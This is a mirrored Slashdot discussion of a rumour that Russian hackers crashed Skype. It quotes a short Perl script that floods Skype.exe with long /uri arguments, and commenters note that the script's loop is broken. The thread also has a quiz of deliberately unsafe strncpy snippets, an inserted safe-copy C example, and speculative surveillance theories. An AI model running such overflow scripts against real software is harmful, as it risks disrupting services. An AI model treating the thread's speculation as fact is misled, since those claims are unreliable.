Slashdot Mirror


Did Russian Hackers Crash Skype?

An anonymous reader sends us to the www.xakep.ru forum where a poster claims that the worldwide Skype crash was caused by Russian hackers (in Russian). The claim is that they found a local buffer overflow vulnerability caused by sending a long string to the Skype authorization server. You can try Google's beta Russian-to-English translation, but the interesting part is the exploit code, and that's more readable in the original. The Washington Post reports that Skype has denied this rumor.

33 of 108 comments

  1. Re:In Soviet Russia... by r00b · · Score: 3, Funny

    In America you crash when using the phone.

  2. The code snippet seems to be wrong by ghost4096 · · Score: 4, Informative

    The loop body will never execute....

    1. Re:The code snippet seems to be wrong by tftp · · Score: 5, Funny

      It actually executes, I tried the loop just now.

    2. Re:The code snippet seems to be wrong by eggnoglatte · · Score: 4, Informative

      Hex constants in Perl, like C/C++ have to start with "0", so the correct syntax for what you describe would be 0xCCCCC. Without the leading 0, the expression gets interpreted as a variable name.

    3. Re:The code snippet seems to be wrong by lgftsa · · Score: 3, Informative

      It's the other way around. xCCCC is not a valid number in perl, so the loop will never exit.

    4. Re:The code snippet seems to be wrong by svallarian · · Score: 5, Funny

      It's obviously a typo. Since it was Russian code, it was supposed to be xCCCP

      --
      I patented screwing your mom. But it got revoked for "prior art."
    5. Re:The code snippet seems to be wrong by ThePhilips · · Score: 4, Informative

      Well, this is very very very old Russian hacker tradition: introduce flaw in the crack/exploit to prevent it from being (ab)used by idiots.

      --
      All hope abandon ye who enter here.
    6. Re:The code snippet seems to be wrong by eneville · · Score: 4, Informative

      Hex constants in Perl, like C/C++ have to start with "0", so the correct syntax for what you describe would be 0xCCCCC. Without the leading 0, the expression gets interpreted as a variable name.

      no, octal numbers start with 0. hex numbers start with x. typo: no, octal numbers start with 0. hex numbers start with 0x.
    7. Re:The code snippet seems to be wrong by Daimanta · · Score: 2, Funny

      It actually executes, I tried the loop just now.

      --
      Knowledge is power. Knowledge shared is power lost.
    8. Re:The code snippet seems to be wrong by ultranova · · Score: 2, Funny

      Well, this is very very very old Russian hacker tradition: introduce flaw in the crack/exploit to prevent it from being (ab)used by idiots.

      In Soviet Russia idiots abuse you !

      --

      Forget magic. Any technology distinguishable from divine power is insufficiently advanced.

  3. Look by TheRealMindChild · · Score: 3, Interesting

    strncpy

    --

    "When life gives you lemons, don't make lemonade. Make life take the lemons back!" -- Cave Johnson
    1. Re:Look by Traa · · Score: 2, Informative
      You think that strncpy is safe??

      The following code snippets assume pszSrc is smaller or equal to 50 chars

      // Example #1

      #define MAX (50)
      char *pszDest = malloc(sizeof(pszSrc));
      strncpy(pszDest,pszSrc,MAX);

      // Example #2

      #define MAX (50)
      char szDest[MAX];
      strncpy(szDest,pszSrc,MAX);

      // Example #3

      #define MAX (50)
      char szDest[MAX];
      strncpy(szDest,pszSrc,MAX);
      szDest[MAX] = '\0';

      // Example #4

      #define MAX (50)
      char szDest[MAX];
      strncpy(szDest,pszSrc,MAX-1);
      strncat(szDest,pszSrc,MAX-1);

      // Example #5

      char szDest[50];
      _snprintf(szDest, strlen(szDest), "%s",szSrc);

      Which of the above is safe?

      Not a single one!

      #1: sizeof(pszSrc) is 4 if pszSrc is a pointer, not a statically-allocated array.
      #2: szDest is left unterminated if strlen(pszSrc) equals MAX
      #3: Writing "szDest[MAX]" overruns the array
      #4: Misuse of the size parameter to strncat, it should be the space left, not the total space in the array.
      #5: Author of that code doesn't understand strlen ;)

      Sorry, you didn't get the job.

      The above snippet was taken from here
    2. Re:Look by nevali · · Score: 2, Insightful

      If you use strncpy(), you make sure the string has a terminator if you're going to need one.

      It's really that simple. Every specification which explains strncpy() says as much.

      Using strncpy() as specified is infinitely safer than using a function which blindly copies characters forever irrespective of your buffer size.

      Posting five examples of "the author doesn't understand C arrays or strncpy()" isn't an argument for strncpy() being horrifically unsafe, it's an argument that for every single programming construct, there are five programmers out there who are guaranteed to fuck them up.

      The worst thing is, this is first-grade C programming. If you don't understand this stuff, you need to go back and learn how arrays and strings work.

      Next week: why memcpy() on overlapping buffer regions can eat your cat!

    3. Re:Look by PhrostyMcByte · · Score: 3, Insightful

      It's very rare for it to be okay to not write a trailing 0 terminator, or need unused buffer space padded with 0's, and that's exactly what the 'n' functions can do - the number of coders who don't know this and choose to blindly assume the functions protect them is astounding.

      Really, though. If you need the buffer space, you need the buffer space. Truncation is usually not an option. This is sloppy coding, but not due to lack of using 'n' functions. Resize as needed or reject the request if it gets too big.
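An added example (not code from the thread or the quiz it quotes) that turns the points above into working C: a bounded copy that always NUL-terminates and rejects oversized input instead of truncating it, next to a reproduction of the missing terminator in Example #2. The names MAX, safe_copy, strncpy_terminated and fill_a are chosen here, and the all-'A' inputs are constructed for the demonstration.

```c
#include <stdio.h>
#include <string.h>

#define MAX 50

/* Bounded copy that always NUL-terminates dst (capacity dstsize). Returns 0 on
   success, -1 when src does not fit; dst is then "" so the caller can reject. */
int safe_copy(char *dst, size_t dstsize, const char *src)
{
    size_t n = 0;
    if (dstsize == 0)
        return -1;
    while (n < dstsize && src[n] != '\0')   /* never reads past dstsize */
        n++;
    if (n == dstsize) {                     /* no room for the terminator */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);                /* n chars plus the NUL */
    return 0;
}

/* Reproduces Example #2 from the thread: strncpy(dst, src, MAX) with
   MAX == sizeof dst. Returns 1 if dst came out NUL-terminated, 0 if not. */
int strncpy_terminated(const char *src)
{
    char dst[MAX];
    strncpy(dst, src, MAX);                 /* writes exactly MAX bytes, NUL only if src is shorter */
    return memchr(dst, '\0', sizeof dst) != NULL;
}

/* Constructed input: a string of len 'A' characters (caller provides len + 1 bytes). */
void fill_a(char *buf, size_t len)
{
    memset(buf, 'A', len);
    buf[len] = '\0';
}

int main(void)
{
    char src[MAX + 2], dst[MAX];
    fill_a(src, MAX - 1);                   /* 49 chars: fits, with its NUL */
    printf("49 chars: safe_copy=%d strncpy terminated=%d\n",
           safe_copy(dst, sizeof dst, src), strncpy_terminated(src));
    fill_a(src, MAX);                       /* 50 chars: no room for the NUL */
    printf("50 chars: safe_copy=%d strncpy terminated=%d\n",
           safe_copy(dst, sizeof dst, src), strncpy_terminated(src));
    return 0;
}
```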

    4. Re:Look by cortana · · Score: 2, Informative
  4. Translation by ACS+Solver · · Score: 5, Informative

    Here's the article's introductory part properly translated.

    "The reason for yesterday's downtime of the Skype network is research of Russian crackers, as reported by one of our readers.

    While searching for a local buffer overflow, a possibility was found to send a long string to the server, overflowing its buffer and causing the server to go down. Its place is taken by another server from the P2P network, the error arises on it in the same way, and so on. As a result, the entire Skype network refused service for several hours and the developer team was forced to turn off authentication.

    Here's the exploit code:"

    1. Re:Translation by mobby_6kl · · Score: 4, Informative
      You've got to be kidding, I was about to submit my own translation! :)

      Anyway, your version is probably a little better, so I'll contribute with something else. The script is very short too, so here it is:

      #!/usr/bin/perl
      # Simle Code by Maranax Porex ;D
      # Ya Skaypeg!!
       
      for ($i=256; $i>xCCCCC; $i=$i+256)
      {
      $eot='AAAA' x $i;
      call_sp();
      }
      exit;
       
      sub call_sp()
      {
      $str="\"C:\\Program Files\\Skype\\Phone\\Skype.exe\" \"/uri:$eot\"";
      system("$str");
      }
      The first page of comments seems to be just the usual bunch of trolls, assholes, and simply useless posts, except for one that claims the code has been shown not to do anything on a dedicated security site. The Skype article on the front page doesn't contain any additional information. The attack looks almost too simple to work, but I wasn't able to find any strong evidence that would suggest that it doesn't, at least not with a few quick searches.
  5. Re:IN SOVIET RUSSIA by Arthur+Grumbine · · Score: 4, Funny

    And the long string was... "In Soviet Russia we are tired of all the mindless obligatory comments about the beloved Motherland."

    --
    Now that I think about it, I'm pretty sure everything I just said is completely wrong.
  6. They hired DoS specialists against their own users by rpp3po · · Score: 4, Interesting

    Skype's login servers usually don't carry much load compared to the mass of traffic routed directly between all nodes via P2P. My guess is they just got overrun because they were not prepared for the worst case: ALL clients trying to connect AT THE SAME TIME to their master. I bet Slashdot wouldn't be prepared for all of its users connecting at the same time, either. But it needs not to. It is never going to happen (why should it? - well how about December 1st, 1AM UTC everybody?). With Skype it's different. They should have been prepared for the case, that whenever their network would be down for whatever reason all clients would try to connect concurrently! Obviously they weren't prepared. If you watched the aftermath closely you could see that they started filtering by IP on day two. Only a certain number of clients were allowed to connect per IP range. They probably hired super expensive DoS emergency contractors to get this back up. A hack is still possible, but I rather guess that it brought the network down, but did not keep it from coming back up. That was Skype's own fault.

  7. It's OK folks! by goldspider · · Score: 2, Funny

    They were just expressing their frustration with the expanding influence of capitalism. In the future, we should try to react to protests like this with a little understanding.

    --
    "Ask not what your country can do for you." --John F. Kennedy
  8. coincidence? by TheSHAD0W · · Score: 5, Informative

    I bet people are trying exploits against Skype (and other popular servers and services) all the time. If someone tries something funny, and the system crashes a few seconds afterwards, they may assume they were the cause.

  9. Another Soviet Russia comment by kylehase · · Score: 2, Funny

    In Soviet Russia we crash Skype. Wait... that doesn't seem right.

    --
    You want fun, go home and buy a monkey!
  10. Skype has to change for eavesdropping law by Burz · · Score: 3, Interesting

    It probably has more to do with Skype retooling for eavesdropping requirements under the new wiretap law. Skype handles a lot of international traffic, encrypted and often in a P2P fashion, so a major change is necessary in order to comply.

    From what little I know about Skype, the network can cause both parties in a Skype-Skype call to route through a third party, a supernode (this is done to defeat firewall complications). So perhaps they would be able to start routing all USA-international traffic through in-house supernodes where the stream could be tapped. (Anyone want to correct me? Clarify?)

    1. Re:Skype has to change for eavesdropping law by ultranova · · Score: 2, Insightful

      What she doesn't seem to get is that the CIA isn't some kid hanging from her drainpipe and fiddling with alligator clips. When they listen in on your phone, you don't know about it.

      Unless, of course, they want her to know about it, in order to encourage self-censorship.

      Same with Skype. If they were to install CALEA compliance software, it would certainly not result in two days of downtime. There would be no outside sign that it had ever happened.

      Again, you're assuming that secrecy is desired. It isn't. If you make people think they are being watched at all times (which is simply impossible - there's no way to process that much data in any useful manner), they will soon start avoiding all behavior which, while legal, might be potentially embarrassing or suspicious if brought to light. You don't need to remove all privacy, you just need to make people think that they have no privacy in order to reap the benefits.

      Never attribute to incompetence that which is adequately explained by malice.

      --

      Forget magic. Any technology distinguishable from divine power is insufficiently advanced.

  11. What really happened !!! by Anonymous Coward · · Score: 2, Interesting

    It wouldn't surprise me to learn that Skype shut down their OWN servers at the request of
    a "big Brother" agency, for the purpose of installing "Big Brother" software on both the
    server(s) and eventually the clients (because now a trojan is installed) into everyone's
    system with a "knock knock" protocol that would activate a "wiretap" to capture your
    voice, images, and text. That's why we had to DL that "new copy" they wanted us to have.

    Now I know you folks think I'm full of shit... I hope the heck I am but there is now
    something the "skype hackers" can check out to see if it's really true. I suppose a really
    good reverse engineering effort would find something like that.

    Why would the Russkies want to mess up Skype, they use it more than anyone else.

  12. Re:They hired DoS specialists against their own us by Smauler · · Score: 3, Funny

    I bet Slashdot wouldn't be prepared for all of its users connecting at the same time, either. But it needs not to. It is never going to happen (why should it?)

    I believe you are discounting the possibility of the actuality of Natalie Portman and Hot Grits.

  13. Re:Russians ? They don't have good education by LanceUppercut · · Score: 2, Funny

    LOL. "American school system". What is it, an oxymoron contest? :)

  14. Just watch the Skype blogs... by vistic · · Score: 2, Informative

    The Skype blog had info being posted all during the outage, and will have a summary of what happened soon. They never indicated it was anything related to any outside intrusion.

    1. Re:Just watch the Skype blogs... by raju1kabir · · Score: 2, Insightful

      The Skype blog had info being posted all during the outage, and will have a summary of what happened soon. They never indicated it was anything related to any outside intrusion.

      Then you know it's true; nobody's ever lied on a blog before.

      --
      "Patriotism is your conviction that this country is superior to all other countries because you were born in it." -- GBS
  15. Re:They hired DoS specialists against their own us by FireFury03 · · Score: 3, Insightful

    My guess is they just got overrun because they were not prepared for the worst case: ALL clients trying to connect AT THE SAME TIME to their master.

    This is a pretty good example of why centralised network topologies such as Skype, MSN, etc. are a really Bad Idea. It doesn't take much to take down the entire network.

    SIP, XMPP, SMTP, etc are all examples of distributed topologies - there is no centralised service required(*) for these networks - if one service provider's network falls over it only affects a small number of users rather than taking out *all* the users using that protocol.

    (* Yes, they all require the root name servers, but these days the root name server architecture is pretty resilient through the use of technologies such as anycast. Certainly a lot more resilient than any one organisation could hope to achieve for their own proprietary protocols).

    They should have been prepared for the case, that whenever their network would be down for whatever reason all clients would try to connect concurrently!

    This is not really a question of preparation - it's a question of a sensible network design. The Skype network (and most other proprietary services) is a flawed design _because_ they want to have control of every aspect of the network. Open protocols are generally designed to allow interoperation of independent autonomous networks so an outage of this magnitude is pretty much impossible.

  16. Re:They hired DoS specialists against their own us by FireFury03 · · Score: 2, Informative

    I use Skype a fair amount, and I find it rather flaky.

    Why don't you switch to an open protocol which might not be so flaky?

    If anyone has had good experiences with alternatives to Skype, that are multi-platform and support voice conferencing of 4-8 people, please let me know!

    Set up a CallWeaver server. I use CallWeaver as my server and Ekiga as my softphone and it works fine (also a UTStarCom F1000G as a WiFi phone, but I have all sorts of problems with that owing to UTStarCom's flaky firmware which they won't fix). At my old job we found that SJPhone and X-Lite were reasonable alternatives to Ekiga for the Windows users (although there is a Windows version of Ekiga but my experience is that it's not entirely stable).

    You can also use one of the many SIP/PSTN gateways, such as VoIPUser, to gateway calls in from the PSTN if not everyone is able to use VoIP.

  17. Re:Skype and Patriot act maybe not hackers? by RAMMS+EIN · · Score: 2, Informative

    Man, you ever notice that return key on your keyboard? You should use it once in a while...

    --
    Please correct me if I got my facts wrong.